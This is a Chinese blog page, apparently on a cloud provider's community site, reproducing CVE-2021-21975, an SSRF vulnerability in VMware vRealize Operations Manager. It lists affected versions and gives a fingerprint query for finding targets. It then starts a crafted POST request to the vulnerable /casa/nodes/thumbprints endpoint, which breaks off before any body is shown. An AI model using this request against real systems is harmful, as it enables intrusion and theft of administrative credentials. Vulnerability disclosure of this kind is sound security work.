VMware vRealize Operations Manager SSRF漏洞（CVE-2021-21975、SSRF）

2024-03-22 08:13:30 阅读次数：28

python，开发语言

一、漏洞描述

vRealize Operations Manager API包含服务器端请求伪造。可以通过网络访问vRealize Operations Manager API的恶意攻击者可以执行服务器端请求伪造攻击(SSRF)，以窃取管理凭据。

二、漏洞影响

vRealize_operations_manager: 8.0.0, 8.0.1, 8.3.0, 8.1.0, 8.1.1, 8.2.0, 7.5.0

cloud_foundation: 4.x 3.x

vRealize_suite_lifecycle_manager: 8.x

三、漏洞复现

title="vRealize Operations Manager"

访问登录页面如下

VMware vRealize Operations Manager SSRF漏洞（CVE-2021-21975、SSRF）

发送请求包如下

POST /casa/nodes/thumbprints HTTP/1.1
Host: 
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, li

上一篇：Java包装类与工具类

下一篇：C语言解题 || 考研100种经典题型-数据类型-进制转换

推荐标签

作者介绍

天翼云小翼

天翼云用户

文章

24092

阅读量

2837919

活动

应用商城

合作伙伴

开发者

支持与服务

了解天翼云

VMware vRealize Operations Manager SSRF漏洞（CVE-2021-21975、SSRF）

VMware vRealize Operations Manager SSRF漏洞（CVE-2021-21975、SSRF）

相关文章

Python统计学13——回归的多重共线性、异方差、自相关的检验

Python自动化小技巧15——读取rar文件中数据文件(无需解压)

Python自动化小技巧17——两张excel表对账，找不同的项目

pandas数据分析39——数据透视表简单实现

Python自动化小技巧19——复制excel表放入word

Python计算分类问题的评价指标(准确率、精确度、召回率和F1值，Kappa指标)

python数据缩放

python自动化办公的一些小工具，函数组件

Python自动化小技巧02——自动解数独

Python统计学12——加权最小二乘

作者介绍

最新文章

Python自动化小技巧15——读取rar文件中数据文件(无需解压)

Python统计学13——回归的多重共线性、异方差、自相关的检验

Python自动化小技巧19——复制excel表放入word

Python自动化小技巧17——两张excel表对账，找不同的项目

字符缓冲流的特有功能

用C#写一个方法对字符串里面的字符次数排序

热门文章

Linux实用命令authconfig和authconfig-tui（备忘）

Python高级变量类型

python学习——面向对象编程

Python数据库测试实战教程

一个简单的http server，处理get和post请求，Python实现

Python编程：生成器yield与yield from区别简单理解

热门标签

相关产品

弹性云主机

天翼云电脑（公众版）

对象存储

云硬盘

随机文章

Python中extend和append的区别

pytest源码目录概要分析

Python操作MySQL就是这么简单

找不到FeignClient Bean对象的解决方法（两个）

Python：使用nltk统计词频并绘制统计图

VB编程：获取字符串中数字个数-50